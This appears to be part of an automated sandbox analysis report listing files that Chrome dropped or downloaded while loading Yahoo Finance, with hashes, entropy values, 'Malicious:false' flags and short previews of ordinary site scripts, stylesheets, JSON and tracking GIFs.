                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:2CA434EC2D792793814D1445FFBD6BF5255649B3D6250D842DA0ACF9429D958A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:7B8854D5FF90757CD505790F18131C996B7B9E519DDBE7C4F9F2F4E9D52CDB7F2328AAC6E054881A723AB27C848CBDD487D42EC762960015775E9713C55D1344
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:....--}f..137-bundle.js..ZKo..v..W...MZ.%....6-h.mC.G..4.......fSM.9U.n=N.7..d.E.,.Jv^fa\$........17.."_...Vkfl.E....q.<.s.*.~...2..8......q*.OE).d1..$...?|.3.y.3.R:_.=.....u.:....)Y<v.l.y...$...R.%...?a.}.......r91...}......1.57...-.[#.,).....<..D.....p...).,.A.C".dt.|.....ln...(...].......G...i....n.2.'Lx......%{.`*......ba-z...:..n1..UA.U..u.<.M...L-...:.2......a.e..'s.p.,"n2[A}..f.m`E."......s-.f.......^....*;...Z.g.e.O..s0.@....8.7c_.....= ...Q....*...^..(SY...20 ]e...K..l......>..V...r....Y.J.i,...(<.=.n[T.P.].........{.;...[-L../.[......u...Dn..k.K.#...WK./N^..|......@.T....Z.Z...m...-....wo...r.....3.........G..~..m....\]...v...u..dI....>.}.../.L]...KsAZ..#[.*..[.....t.3..o-.+..J%.[.],b.Z...5H....:.V`N......f...;.@n...OL.8a.....fX%}..,...mg.E.l.......k.{%e.Ac.B.]...O.R.e......Wq.\.|^.4....H;w=.".q%kSDc...JWYj"R0.&5W..L.K/.Y.Qi.]1?W..Q..G.h...Kt}...w..:...#...3......N&.D.cX.....@.i.~...R.F.-[<y?.....h.v>2...Q'H...Tav$...Vb7.|.@3..5....
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (28463)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):28466
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.525606246446017
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:pXdh5IlS+REMvcE6zS90W6HlnQZWDaVyFBqqTz:+6a0vhqdqP
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:2CDA5DC65B2A4893D5EC07AA83D6A709
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:A19BC9BAD9360C543583EF1E46DD7817E91D5D5F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:A85F31774DF73053E0519FC52A5D1B55145BD7864A72513684A27BC4270195BD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:91DB38CFA20B75FE260E89DE309C4DD269E130E7D0A9CE0D515E7E16632E24C638AD02918096ACB5199D09252A1F952BD8DF21A2B4514D02D509141976D5D921
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as w,e as k,b as me,t as R,d as T,f as I,i as g,j as Ee,h as S,q as y,L as Le,k as m,l as D,n as E,m as J,p as V,H as pe,z as Ae,A as ce,W as Ne,B as ge,K as ye}from"./scheduler.Dsuh-FKt.js";import{S as G,i as H,c as x,b as $,m as ee,t as b,a as P,d as te,g as Re,e as Se}from"./index.CvwOawEI.js";import{N as Oe,t as ue,m as be,o as De,q as ve,g as we,v as Ge,b7 as ke}from"./commonUtil.BWwawKjd.js";import{j as He,i as Ve}from"./quoteUtil.C6mXO8A-.js";/* empty css */import{S as Be}from"./StatusTag.Cy1VuVbC.js";import{R as Te,a as Ue,S as Fe}from"./StarRating.c2tDcFcM.js";import{C as Pe}from"./Change.DtNqnL99.js";import{C as Ye,T as Ie}from"./Ticker.CDUz2TSK.js";import{P as ze,T as We,a as de,E as Ke,b as qe,S as je,c as Ze}from"./Table.BmsyL-vx.js";import{g as he,a as Xe}from"./spread.CgU5AtxT.js";import{P as se}from"./PortfolioSymbolCount.svelte_svelte_type_style_lang.n39zXuiY.js";import{B as Qe}from"./Button.C2rixdaC.js"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):721
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.9836850609023
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:YmRcZcSgPbmRc8+tHBbZ9TR3jJeyFeTR3jvEyirTR3jZN5oTR3jZN5uH4:YmS69jmS9HTPzJeVzMLBzvmzvg4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:A3475AFBE9A8CF075B8F25570F511177
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:84BF3F5610CED4D2930104EC508B14DB0A801382
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:4677DC067597E18AD19929D899AEEB71997964D9E3AD1FEC38713EB18A546A09
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:E0D2F8B44E98393B986DF758149CDBD59E4333E0BA33B542DA2F98915A790DBDFA8D3CFF062176E2DC1D6F03821A75AA8AB296895C03FCF9E65CD8224457885F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/manifest.webmanifest
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:{"name":"Yahoo Finance - Business Finance, Stock Market, Quotes, News","short_name":"Yahoo Finance","start_url":"/","display":"standalone","background_color":"#2196F3","lang":"en","scope":"/","icons":[{"src":"https://s.yimg.com/cv/apiv2/default/finance/favicon-192x192.png","type":"image/png","sizes":"192x192"},{"src":"https://s.yimg.com/cv/apiv2/default/finance/favicon-300x300.png","type":"image/png","sizes":"300x300"},{"src":"https://s.yimg.com/cv/apiv2/default/finance/favicon-512x512.png","type":"image/png","sizes":"512x512"},{"src":"https://s.yimg.com/cv/apiv2/default/finance/favicon-512x512.png","type":"image/png","sizes":"512x512","purpose":"any maskable"}],"orientation":"portrait","theme_color":"#037b66"}.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (24044)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):24138
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.520019053238329
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:bKq94ql1HP58madPeT9tnLKjXhza3N6QatV0exHP52VvDV12XT6wbEO:bKq94qjRwPYhLKVGNWueHOR10QO
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:83B536BA88196A91E6A8586A168DF585
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:4342A1F67276A560AB9089FB26EE226377553428
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:061D8F0890AAC62DB4E9EF203CD4DFFC6D5F33E9C258AACE3AE9250D8928C331
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B2C7BD054EB683E666F1CDF94B0FC305E2951F6B859CDA1D28E31250FD85A6CC9128AEDF444AB214D7804CDEC0973C8A472553E2C4507D050B98A3298F1C79AC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! For license information please see common-d20b4312.292bdb8decadf75c96e0.js.LICENSE.txt */.(self.webpackChunk_vzmi_finance_cosaic=self.webpackChunk_vzmi_finance_cosaic||[]).push([[3647],{4490:(e,t,n)=>{"use strict";n.d(t,{x:()=>a});const a=async(e,t,n)=>{const[a]=e.split("-");t.I18N.setLocale(n,e),"en"!==a&&a&&(n.internationalizer&&(n.internationalizer.hourMinute=new Intl.DateTimeFormat(e,{hour:"numeric",minute:"numeric",hour12:!0}),n.internationalizer.hourMinuteSecond=new Intl.DateTimeFormat(e,{hour:"numeric",minute:"numeric",second:"numeric",hour12:!0})),t.I18N.wordLists={[a]:await r(a)},t.I18N.setLanguage(n,a))},r=async e=>(await n(9144)(`./${e}.json`)).default},2421:(e,t,n)=>{"use strict";function a(e){if("number"!=typeof e)return"-";const t=Math.abs(e);return t>=1e15?`${(e/1e15).toFixed(2)}Q`:t>=1e12?`${(e/1e12).toFixed(2)}T`:t>=1e9?`${(e/1e9).toFixed(2)}B`:t>=1e6?`${(e/1e6).toFixed(2)}M`:t>=1e3?`${(e/1e3).toFixed(2)}K`:String(e)}n.d(t,{H:()=>a})},3734:(e,t,n)=>{"use strict";n.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUnl/7yltxlHh/:/+/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:07FFF40B5DD495ACA2AC4E1C3FBC60AA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:E8AC224BA9EE97E87670ED6F3A2F0128B7AF9FE4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:A065920DF8CC4016D67C3A464BE90099C9D28FFE7C9E6EE3A18F257EFC58CBD7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:49B8DAF1F5BA868BC8C6B224C787A75025CA36513EF8633D1D8F34E48EE0B578F466FCC104A7BED553404DDC5F9FAFF3FEF5F894B31CD57F32245E550FAD656A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):39
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.1772155278654886
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:BVCHYKXbFnCJ:BMHn9CJ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:A82BCE0734BE83B474EAF1F1ADA8139C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:F11AD97BFFC08D1B81945FCE0B2AA6F12F278FC4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:85C9F78822701AD5F3A94497491296DF5D68985A4E1313CABF64A734ABD315AA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:F72EFF32EEACE39A8341966C16308EC941829F46DDAA955ED2AD0C2FD94F122B97CACF86FB99B1CF7F64C89D405CCB408DB1474EEB70EC41CAEC96905AD7BBD3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const s=!0,o=!1;export{s as b,o as d};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (35505), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):35505
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.227715216344498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:sYUZ40ObVKNBjaaIWYxpQ6ZM5CW4E9wdWA2nJlQr9qo764GRrKtJ:D0ObVKNBjaaIWApQ6i5CGwdWA2nJlQrr
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:4636CB14C3D8D1EBA5BB4DA2CFCF18AA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:68615EE696008A4B9ADB0E7BC7A2A4DD4FA4F41F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:A02F925DF2E7879D16ACE7355007AA590813CE71082466242C75F668AF18A668
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:7B81E4FBF1033AB76444319DBF120198075A10655CE4C763EB2A54AF0E24F52B572DF34E05C59D3C01BB6AA9236F5FB981261565B79AF9178FEB5ED60D522252
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-scrollview",[],t):"object"==typeof exports?exports["wafer-scrollview"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-scrollview"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(s){if(i[s])return i[s].exports;var r=i[s]={i:s,l:!1,exports:{}};return e[s].call(r.exports,r,r.exports,t),r.l=!0,r.exports}var i={};return t.m=e,t.c=i,t.d=function(e,i,s){t.o(e,i)||Object.defineProperty(e,i,{configurable:!1,enumerable:!0,get:s})},t.n=function(e){var i=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(i,"a",i),i},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,i){"use strict";function s(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a fun
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):84
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.723115048867277
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:YQ3/eHilKBiGapsEIMOcMQGB7p73wWLW6n:YQ3tK9/EdzRah3wMW6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:CE04E5D2C9EBC7F0021C9E40DAB4C76B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:B384C90D9B90E04B5EE514E82D93781766CFAF29
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:CBF5B16068AD62DED00520E13A6E45F42422A0B9715F304E9FAEF80046663FFB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:8D2D3A5B77793FCC0D7C2EC7A02E908428C71F9244F91F82A0EC06EF1A55DDC816E1DCC3B54A98821CF2D0E497DCE101217882569EAF8136EBAFCA1D14CF3964
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:{"user":{"id":"718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383","isNewUser":false}}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):203
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.654041277913105
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:GzJDNNM/3PLKH57seBuPsRU4XdNUeMZe1MAyPLKH57seBuPsRUeWL6DfIXa+hDI6:mf6LKZ7svsR4ppLKZ7svsR2L6GZU6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:61E8366DAD4472D50DA66B9A187489EF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:EC9AD2AA66D593E69668A4627D2630309C722AAD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:4D60379E58BA81092FEF6533CD52F6C55F41693DBA0398C8E82353BBCFEC12A0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:D933F485017B5CB578B3AE9C59D9753A09A3782FFBF4B56CC01DFF52689D8DCEFA3AAC426E303FF57665DE271B290F3113E91A017A7E847BBBE3979DB7F2F692
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/DataTable.BIS1yioW.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:div.yf-h8l7j7{white-space:nowrap;overflow:hidden;text-overflow:ellipsis}p.yf-8r8tzo{font-size:var(--font-m);white-space:nowrap;overflow:hidden;text-overflow:ellipsis;font-weight:var(--font-weight-bold)}.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (3636)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):3637
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.478304456163035
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:yMz5Oa9GJEKo2WOSSKfBCGcudNg41FQ6bFRtB7t5Sfd:yS51GJEhDSWAGcWQ6bFRtBOfd
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:F81285961AD5D03C2217D9416BE8044A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:2083E0260F5B7DAF1538B2A01D3BBCB7500EBEF8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:0E44ED73DCE73AFC5DAF11E91DC1967625DC25BD5AD483412F21EAD57AB06FB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:338D583A530076B05E7F05663136CFA9412595BC577CBA3A52C51AC0EC3941929A50897065D6532EF0F2DE766F7F34E6EC360264F1CD808D4F3E146004A097CC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/LeafNewsStream.fbxy526h.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as j,p as T,k as I,i as g,o as P,e as K,d as L,f as q,q as _,O as z,l as O,R,n as B}from"./scheduler.Dsuh-FKt.js";import{S as G,i as H,g as J,a as h,e as Q,t as S,c as W,b as x,m as V,j as U,d as v}from"./index.CvwOawEI.js";import{g as A,e as X}from"./commonUtil.BWwawKjd.js";import{F as Y}from"./FilteredStories.BZDUwXYM.js";import{S as Z}from"./Spinner.D9ew0_W4.js";import{f as p}from"./index.CwoOB1cS.js";import{l as $}from"./loadNewsStream.DpYg868c.js";function ee(l){let e,t,i,m,f,s;return i=new Y({props:{stream:l[6],i13nModel:{sec:"qsp-news",...l[0]},variant:"stream",maxStoryCount:l[2],infiniteScroll:!0,infiniteScrollThreshold:l[7]?850:450,onLoadMore:l[10],imageKey:l[3],size:"x-large",storyItemProps:{maxTickers:l[5]}}}),{c(){e=K("div"),t=K("div"),W(i.$$.fragment),this.h()},l(r){e=L(r,"DIV",{class:!0,"data-testid":!0});var a=q(e);t=L(a,"DIV",{class:!0});var o=q(t);x(i.$$.fragment,o),o.forEach(g),a.forEach(g),this.h()},h(){_(t,"class","holder yf-17l7f4i"),_(e,"class",f=z(`news-
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (24308)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):24415
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.280470298246086
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:UXk0S8r+1JWAbMK0iVE3et6MOmZe8CLLcSmZ4pJJo0g4kuwYL2zZxHduyS/N9Nya:8k0S8r+1JrbMK0iVEut1OmZe8YLowJT/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:2469CA4BCFD4E629A62432D0B42866B2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:5BF16910FC91FDC0D1B6787734969C9D3558F089
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:BE93A82EB368176535AC8C154DDEE884802AE81596890FE256CB6A8F49016018
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:6DACA9E351AFE429EAC673A81122E27DB04D4B2B6A5BD2280562F1DE57B79463568A1674D8196149DC891598495C45FDFB5DD710F6ACC432CAA415C49A7B910C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://static-cdn.spot.im/production/registration/tags/v1.46.0/736-bundle.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! For license information please see 736-bundle.js.LICENSE.txt */.(self.webpackChunkregistration=self.webpackChunkregistration||[]).push([[736],{6012:(t,e,r)=>{"use strict";r.d(e,{cp:()=>Vt,U$:()=>Nt});var n=r(912);var o=r(5660),c=r(2684);function i(t){var e=this.__data__=new n.c(t);this.size=e.size}i.prototype.clear=function(){this.__data__=new n.c,this.size=0},i.prototype.delete=function(t){var e=this.__data__,r=e.delete(t);return this.size=e.size,r},i.prototype.get=function(t){return this.__data__.get(t)},i.prototype.has=function(t){return this.__data__.has(t)},i.prototype.set=function(t,e){var r=this.__data__;if(r instanceof n.c){var i=r.__data__;if(!o.c||i.length<199)return i.push([t,e]),this.size=++r.size,this;r=this.__data__=new c.c(i)}return r.set(t,e),this.size=r.size,this};const a=i;var u=r(8043);const s=function(){try{var t=(0,u.c)(Object,"defineProperty");return t({},"",{}),t}catch(t){}}(),f=function(t,e,r){"__proto__"==e&&s?s(t,e,{configurable:!0,enumerable:!0,value:r,wr
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):410599
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.543329350823563
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:TrY1YJjKmZYEyelcPinYYYmjoVYgYojPdYuYgjp67YZY5j7XY6Y+jkjYSymlJ7Lk:EhPVtNS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:216D030903C9AACFC683F142ED1D5FAE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:13BC948B183DC1E9658153CEB494DA877C0D4CC2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:B813E850BAC7D0FAAD85AA1D30FDE8DF75B1566A770AEE928B9F52B386161E5E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:6B1D78F8FEFFF4DAAC4E007616EEA63A968815A63F67CF131AABB40C82F3F78DA2AA53150046FA790AAE7D0FE445791B81A0A5A10342B081B7C3779E8E006F84
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:"https://www.yahoo.com/caas/content/article/?uuid=2b2a262c-878f-3f65-9ba6-39ad37b780eb,b919e796-b03c-39fc-87e7-500abd2430fc,dce5eeb8-da4f-3016-b6b1-671a1b05f180,cc162679-b996-3b22-bf08-a33e637cd3e7,e83ce260-cc8d-4911-9251-00d71cd9beb8,877f8ab1-324b-3028-8015-3030372e4744,12f9c9af-c6c2-3c17-b79d-5f82604d80b2,9df6c4a7-8f43-3b8c-bc27-cbec371808d8,d6bedef8-7f7f-361b-a1ed-95df489e3d8b,17667347-cb18-3690-87e0-525837a669bf&appid=news_web&device=desktop&lang=en-US&region=US&site=fp&partner=none&bucket=900,seamless&features=enableEVPlayer,enableOverrideSpaceId,contentFeedbackEnabled,enableAdFeedbackV2,enableInArticleAd,enableOpinionLabel,enableSingleSlotting,enableVideoDocking,outStream,showCommentsIconWithDynamicCount,enableStickyAds,showCommentsIconInShareSec,enableAdSlotsNewMap,enableGAMAds,enableGAMAdsOnLoad,enableFinancePremiumTicker,enableAdLiteUpSellFeedback,enableRRAtTop,enableCommentsCountInViewCommentsCta,enableRRAdsSlots,enableRRAdsSlotsWithJAC,newsModal,enableViewCommentsCTA&rid=1pa4ckpjflnfm"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:{"items":[{"data":{"partnerData":{"adMeta":{"hashtag":"news;disasters;weather;naturalphenomena;culture;natureandenvironment","isSupplySegment":"false","lang":"en-US","region":"US","rs":"lmsid:a0a6T00000R2KXGQA3;revsp:cnn_articles_875;lpstaid:2b2a262c-878f-3f65-9ba6-39ad37b780eb;pt:content;pd:modal;ver:megastrm;pct:story","site_attribute":"wiki_topics=\"North_Carolina;South_Carolina;Joe_Biden;White_House;Hurricane_Helene_%281958%29;Asheville,_North_Carolina;Florida;Infrastructure;Henderson_County,_North_Carolina;Mobile_phone_signal;Deanne_Criswell;Buncombe_County,_North_Carolina;Donald_Trump;Craig_Fugate;Kamala_Harris;Tennessee;Michelle_Coleman;National_Weather_Service\" ctopid=\"18857489;18859489;1985000;12818000;1996000\" hashtag=\"news;18857489;18859489;1985000;12818000;1996000\" rs=\"lmsid:a0a6T00000R2KXGQA3;revsp:cnn_articles_875;lpstaid:2b2a262c-878f-3f65-9ba6-39ad37b780eb;pt:content;pd:modal;ver:megastrm;lu:0;pct:story\"","spaceid":"1197792446","site":"news","enabled":true,"pos":
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):48269
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.162628750394423
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
